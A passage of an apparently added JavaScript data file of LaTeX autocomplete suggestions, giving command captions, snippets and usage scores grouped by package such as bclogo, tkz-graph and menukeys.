'glossaries-extra-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'glossaries-extra-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'glossaries-extra-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-extra-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'glossaries-extra-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-extra-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'glossaries-extra-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'glossaries-extra-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-extra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'glossaries-extra-cmd', + score: 0.0063276692758974925, + }, + ], + dashrule: [ + { + caption: '\\hdashrule[]{}{}{}', + snippet: '\\hdashrule[$1]{$2}{$3}{$4}', + meta: 'dashrule-cmd', + score: 0.00029867998381154486, + }, + ], + bclogo: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bclogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'bclogo-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'bclogo-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bclogo-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'bclogo-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'bclogo-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'bclogo-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'bclogo-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'bclogo-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bclogo-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'bclogo-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'bclogo-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bclogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bclogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bclogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'bclogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'bclogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'bclogo-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bclogo-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'bclogo-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bclogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'bclogo-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'bclogo-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'bclogo-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'bclogo-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'bclogo-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'bclogo-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bclogo-cmd', + score: 0.004719094298848707, + }, + ], + isomath: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'isomath-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'isomath-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'isomath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'isomath-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'isomath-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'isomath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'isomath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'isomath-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'isomath-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'isomath-cmd', + score: 0.021170869458413965, + }, + ], + 'tkz-graph': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-graph-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-graph-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-graph-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-graph-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-graph-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-graph-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-graph-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-graph-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tkz-graph-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tkz-graph-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tkz-graph-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tkz-graph-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-graph-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-graph-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-graph-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-graph-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-graph-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-graph-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-graph-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-graph-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-graph-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-graph-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-graph-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-graph-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-graph-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-graph-cmd', + score: 0.2864294797053033, + }, + ], + sourcesanspro: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'sourcesanspro-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'sourcesanspro-cmd', + score: 0.008565354665444157, + }, + ], + longdivision: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'longdivision-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'longdivision-cmd', + score: 0.2864294797053033, + }, + ], + xmpmulti: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xmpmulti-cmd', + score: 0.00037306820619479756, + }, + ], + epsdice: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsdice-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'epsdice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'epsdice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'epsdice-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'epsdice-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'epsdice-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epsdice-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'epsdice-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsdice-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'epsdice-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'epsdice-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'epsdice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'epsdice-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'epsdice-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'epsdice-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsdice-cmd', + score: 0.004719094298848707, + }, + ], + apptools: [ + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'apptools-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\AtAppendix{}', + snippet: '\\AtAppendix{$1}', + meta: 'apptools-cmd', + score: 8.82390883984482e-6, + }, + ], + letltxmacro: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'letltxmacro-cmd', + score: 0.008565354665444157, + }, + ], + menukeys: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'menukeys-cmd', + score: 0.354445763583904, + }, + { + caption: '\\adjustbox{}{}', + snippet: '\\adjustbox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.002008185536556013, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'menukeys-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'menukeys-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\usepackage{}', + snippet: '\\usepackage{$1}', + meta: 'menukeys-cmd', + score: 5.427890758130527, + }, + { + caption: '\\usepackage[]{}', + snippet: '\\usepackage[$1]{$2}', + meta: 'menukeys-cmd', + score: 5.427890758130527, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'menukeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'menukeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'menukeys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\mathlarger{}', + snippet: '\\mathlarger{$1}', + meta: 'menukeys-cmd', + score: 0.0031475241540308316, + }, + { + caption: '\\smaller', + snippet: '\\smaller', + meta: 'menukeys-cmd', + score: 0.001271007880944704, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'menukeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'menukeys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'menukeys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'menukeys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'menukeys-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'menukeys-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'menukeys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'menukeys-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'menukeys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'menukeys-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'menukeys-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'menukeys-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'menukeys-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'menukeys-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'menukeys-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'menukeys-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'menukeys-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'menukeys-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'menukeys-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'menukeys-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'menukeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'menukeys-cmd', + score: 7.723677706376668e-5, + }, + { + caption: 